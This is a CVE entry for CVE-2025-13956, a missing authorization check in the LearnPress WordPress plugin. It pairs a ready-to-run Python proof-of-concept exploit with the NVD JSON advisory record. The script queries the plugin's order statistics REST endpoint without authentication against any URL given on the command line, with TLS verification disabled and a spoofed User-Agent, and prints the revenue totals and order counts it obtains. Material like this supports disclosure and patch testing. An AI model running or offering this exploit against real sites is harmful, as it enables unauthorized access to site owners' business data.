CVE-2025-13956

import requests import json # CVE-2025-13956 PoC - LearnPress Unauthenticated Statistics Access # Target: WordPress site with LearnPress plugin <= 4.3.1 def exploit_learnpress_cve_2025_13956(target_url): """ Exploit for CVE-2025-13956: LearnPress Unauthenticated Access to Order Statistics This vulnerability allows unauthenticated attackers to view plugin's orders statistics, including total revenue summaries and order status counts via REST API endpoint. CVSS: 5.3 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N """ # Target REST API endpoint endpoint = "/wp-json/learnpress/v1/orders/statistic" url = target_url.rstrip('/') + endpoint print(f"[*] Target: {url}") print(f"[*] Exploiting CVE-2025-13956...") try: # Send unauthenticated GET request headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: data = response.json() print(f"[+] SUCCESS: Unauthenticated access to statistics!") print(f"[+] Response Data:") print(json.dumps(data, indent=2)) # Extract sensitive statistics if 'revenue' in data: print(f"\n[!] Total Revenue Exposed: {data.get('revenue')}") if 'order_counts' in data: print(f"[!] Order Counts Exposed: {data.get('order_counts')}") return data else: print(f"[-] Failed: Status {response.status_code}") print(f"[-] Response: {response.text[:500]}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_13956.py <target_url>") print("Example: python cve_2025_13956.py https://example.com") sys.exit(1) target = sys.argv[1] exploit_learnpress_cve_2025_13956(target)

{"cve": {"id": "CVE-2025-13956", "sourceIdentifier": "[email protected]", "published": "2025-12-16T05:16:08.513", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/rest-api/v1/frontend/class-lp-rest-orders-controller.php#L36", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b833c3-818d-4646-bd6d-8b3be13ea0f1?source=cve", "source": "[email protected]"}]}}